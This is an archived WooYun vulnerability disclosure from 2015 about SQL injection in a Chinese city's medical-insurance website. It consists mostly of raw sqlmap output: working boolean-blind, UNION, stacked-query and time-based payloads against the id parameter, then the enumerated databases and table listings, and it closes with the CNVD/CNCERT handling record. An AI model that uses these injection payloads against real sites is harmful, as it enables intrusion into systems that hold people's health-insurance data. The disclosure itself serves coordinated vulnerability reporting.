乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-27: 细节已通知厂商并且等待厂商处理中 2015-10-30: 厂商已经确认,细节仅向厂商公开 2015-11-09: 细节向核心白帽子及相关领域专家公开 2015-11-19: 细节向普通白帽子公开 2015-11-29: 细节向实习白帽子公开 2015-12-14: 细节向公众公开
某市医保网存在SQL注射。可执行命令
丹阳市医疗保险管理中心http://**.**.**.**/list.aspx?id=6129
sqlmap identified the following injection points with a total of 68 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6129 AND 4522=4522 Type: UNION query Title: Generic UNION query (NULL) - 21 columns Payload: id=-2313 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(72)+CHAR(120)+CHAR(115)+CHAR(80)+CHAR(112)+CHAR(106)+CHAR(79)+CHAR(75)+CHAR(68)+CHAR(81)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=6129; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=6129 WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6129 AND 4522=4522 Type: UNION query Title: Generic UNION query (NULL) - 21 columns Payload: id=-2313 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(72)+CHAR(120)+CHAR(115)+CHAR(80)+CHAR(112)+CHAR(106)+CHAR(79)+CHAR(75)+CHAR(68)+CHAR(81)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=6129; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=6129 WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008available databases [15]:[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] sqlcyyw[*] sqldyybzx[*] sqlgqsys[*] sqlhuiye[*] sqllxzg16com[*] sqlmmcar[*] sqlmymssql[*] sqlsql921716[*] sqlwanmei[*] tempdbsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6129 AND 4522=4522 Type: UNION query Title: Generic UNION query (NULL) - 21 columns Payload: id=-2313 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(72)+CHAR(120)+CHAR(115)+CHAR(80)+CHAR(112)+CHAR(106)+CHAR(79)+CHAR(75)+CHAR(68)+CHAR(81)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=6129; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=6129 WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008available databases [15]:[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] sqlcyyw[*] sqldyybzx[*] sqlgqsys[*] sqlhuiye[*] sqllxzg16com[*] sqlmmcar[*] sqlmymssql[*] sqlsql921716[*] sqlwanmei[*] tempdbDatabase: sqldyybzx+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.dyyb_guestbook | 721 || dbo.dyy_ddjg | 92 || dbo.dyyb_News | 72 || dbo.dyyb_zcfg | 24 || dbo.dyyb_Menu | 21 || dbo.Sys_TMenu | 21 || dbo.dyyb_notice | 14 || dbo.dyyb_qfcx | 10 || dbo.dyyb_bslc | 8 || dbo.dyyb_jgjs | 7 || dbo.dyyb_ybzh | 5 || dbo.Sys_TUser | 5 || dbo.dyyb_about | 4 || dbo.dyyb_advertis | 4 || dbo.dyyb_jgsz | 4 || dbo.dyyb_admin | 2 || dbo.dyyb_ybml | 2 |+--------------------------------------------------+---------+Database: master+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| sys.messages | 98318 || sys.sysmessages | 98318 || sys.fulltext_system_stopwords | 15829 || sys.syscolumns | 11966 || sys.all_parameters | 7090 || sys.system_parameters | 7090 || sys.trace_subclass_values | 5366 || sys.all_columns | 4670 || sys.system_columns | 4626 || sys.trace_event_bindings | 4304 || sys.syscomments | 2994 || dbo.spt_values | 2508 || sys.all_objects | 1934 || sys.sysobjects | 1934 || sys.system_objects | 1928 || sys.syspermissions | 1844 || sys.sysprotects | 1843 || sys.all_sql_modules | 1783 || sys.system_sql_modules | 1783 || sys.dm_audit_actions | 454 || sys.spatial_reference_systems | 390 || sys.event_notification_event_types | 365 || sys.all_views | 354 || sys.system_views | 354 || sys.trigger_event_types | 245 || sys.trace_events | 180 || sys.allocation_units | 128 || sys.partitions | 116 || sys.syscharsets | 114 || sys.xml_schema_facets | 112 || sys.xml_schema_components | 99 || sys.system_components_surface_area_configuration | 95 || sys.dm_audit_class_type_map | 83 || sys.xml_schema_types | 82 || sys.configurations | 68 || sys.sysconfigures | 68 || sys.syscurconfigs | 68 || sys.trace_columns | 66 || sys.fulltext_document_types | 50 || sys.fulltext_languages | 48 || INFORMATION_SCHEMA.COLUMNS | 44 || sys.columns | 44 || sys.systypes | 34 || sys.types | 34 || sys.syslanguages | 33 || sys.securable_classes | 22 || sys.trace_categories | 21 || sys.xml_schema_component_placements | 18 || INFORMATION_SCHEMA.SCHEMATA | 15 || sys.database_recovery_status | 15 || sys.databases | 15 || sys.schemas | 15 || sys.sysdatabases | 15 || sys.xml_schema_attributes | 15 || sys.database_principals | 14 || sys.sysusers | 14 || sys.server_principals | 11 || sys.service_contract_message_usages | 11 || sys.server_permissions | 7 || sys.sysindexes | 7 || sys.indexes | 6 || sys.objects | 6 || sys.stats_columns | 6 || sys.stats_columns | 6 || INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 || INFORMATION_SCHEMA.TABLES | 5 || sys.index_columns | 5 || sys.sysindexkeys | 5 || sys.tables | 5 || sys.endpoints | 4 || sys.assembly_types | 3 || sys.service_queue_usages | 3 || sys.type_assembly_usages | 3 || sys.xml_schema_namespaces | 3 || sys.database_files | 2 || sys.login_token | 2 || sys.sql_logins | 2 || sys.sysfiles | 2 || sys.syslogins | 2 || sys.user_token | 2 || dbo.spt_monitor | 1 || sys.assemblies | 1 || sys.assembly_files | 1 || sys.data_spaces | 1 || sys.database_role_members | 1 || sys.default_constraints | 1 || sys.dm_exec_requests | 1 || sys.dm_exec_sessions | 1 || sys.filegroups | 1 || sys.server_role_members | 1 || sys.servers | 1 || sys.sysconstraints | 1 || sys.sysfilegroups | 1 || sys.sysmembers | 1 || sys.sysprocesses | 1 || sys.sysservers | 1 || sys.tcp_endpoints | 1 || sys.via_endpoints | 1 || sys.xml_schema_collections | 1 || sys.xml_schema_model_groups | 1 || sys.xml_schema_wildcards | 1 |+--------------------------------------------------+---------+Database: msdb+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.backupfile | 32 || dbo.restorefilegroup | 18 || dbo.restorefilegroup | 18 || dbo.restorehistory | 18 || dbo.backupset | 16 || dbo.backupmediafamily | 13 || dbo.backupmediaset | 13 || dbo.syspolicy_configuration | 4 |+--------------------------------------------------+---------+
危害等级:高
漏洞Rank:10
确认时间:2015-10-30 15:08
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无
